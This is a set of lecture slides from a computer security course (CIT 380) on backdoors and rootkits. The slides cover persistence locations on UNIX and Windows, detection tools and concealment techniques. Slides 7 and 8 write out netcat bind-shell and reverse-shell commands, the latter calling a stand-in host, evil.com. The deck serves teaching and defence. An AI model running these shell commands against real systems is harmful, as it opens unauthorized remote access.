1. CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Backdoors and Rootkits

2. CIT 380: Securing Computer SystemsSlide #2 Topics Backdoors –Backdoor Types. –Netcat Backdoors. –Reverse Telnet. –Concealing Backdoors. Rootkits –User-mode Rootkits –Kernel Rootkits –Detecting Rootkits –Recovery from a Rootkit

3. CIT 380: Securing Computer SystemsSlide #3 Types of Backdoors Local Privilege Escalation Remote Command Execution Remote Shell Access Remote GUI Control

4. CIT 380: Securing Computer SystemsSlide #4 Starting Backdoors on UNIX /etc/inittab Startup scripts –/etc/rc.d and /etc/init.d scripts –Add a new script. –Modify an existing script. inetd –Add a new service to /etc/inetd.conf User startup scripts –.bashrc,.login,.cshrc,.xinitrc,.xsession, etc. cron

5. CIT 380: Securing Computer SystemsSlide #5 Starting Backdoors on Windows Autostart Folders –C:\Documents and Settings\[user]\Start Menu\Programs\Startup Startup Scripts –C:\Windows\win.ini, System.ini, Wininit.ini, etc. Registry Keys –HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Many others. Task Scheduler

6. CIT 380: Securing Computer SystemsSlide #6 Finding Backdoor Scripts Manual Scan –Time-consuming and error prone. Automatic –UNIX: chkrootkit, Titan –Windows: Autorun from www.sysinternals.comwww.sysinternals.com File Integrity Check –HIDS like Tripwire or Osiris

7. CIT 380: Securing Computer SystemsSlide #7 Netcat Backdoors # nc –l –p 2222 –e /bin/sh (server on victim) $ nc victim.org 2222 (client on attacker host) Netcat (client) stdout stdin Netcat (server) stdout stdin Network

8. CIT 380: Securing Computer SystemsSlide #8 Reverse Backdoors What if the firewall blocks port 2222? What if the firewall blocks all incoming connections to victim.org? Solution: –Run the listener on the attacker host (evil.com). nc –l –p 80 –Run the client with a shell on the victim host. nc evil.com 80 –e /bin/sh

9. Remote-Control Backdoors List of thousands –http://www.megasecurity.org/Main.htmlhttp://www.megasecurity.org/Main.html

10. Windows Control Tools Page 559 VNC – http://www.realvnc.com/http://www.realvnc.com/ Dameware – http://www.dameware.com/http://www.dameware.com/ Back Orifice 2000 – www.bo2k.comwww.bo2k.com SubSeven - http://www.packetstormsecurity.org/ http://www.packetstormsecurity.org/

11. Remote Control Backdoor Capabilities Table 10.3 – Page 559-601 Pop-up dialogs to dupe the user to enter information Keystroke logger List detailed system information Gather passwords Change registry setting Remote shell access

12. BO2K Page 562 – Figure 10.3

13. Distribution Email as an attachment from an infected machine to everyone in the contact list. In a wrapper program such as a game, a greeting card, etc. Emails the attacker or notifies via IRC ActiveX sends code from a Web server to a browser where it is executed. ActiveX can do anything on a user machine that the user can do. Page 564 – Figure 10.4

14. CIT 380: Securing Computer SystemsSlide #14 Defenses against Backdoors Detection –Port scans, e.g., nmap Prevention –Firewall on local host. –Use proxying firewall instead of packet filter.

15. CIT 380: Securing Computer SystemsSlide #15 Concealing Backdoors Encryption –Pipe through encryption program. –Use cryptcat or socat. Backdoors without ports. –ICMP backdoors. Loki, ICMP tunnel. –Sniffing backdoors.

16. CIT 380: Securing Computer SystemsSlide #16 Non-promicuous Sniffers Cd00r listens for all traffic to victim host. –Waits for appropriate port knock sequence. –After port knock can Open TCP shell port 5002. Reverse telnet a shell to attacker host. Sniff commands off wire.

17. CIT 380: Securing Computer SystemsSlide #17 Promiscuous Sniffing Backdoors 1.Install sniffing backdoor on victim host. 2.Send backdoor commands to sucker host. 3.Backdoor sniffs packets. 4.Backdoor responds with packets forged to be from sucker host.

18. CIT 380: Securing Computer SystemsSlide #18 Promiscuous Sniffing Backdoors victim host sucker host attacker host firewall sniff Internet spoof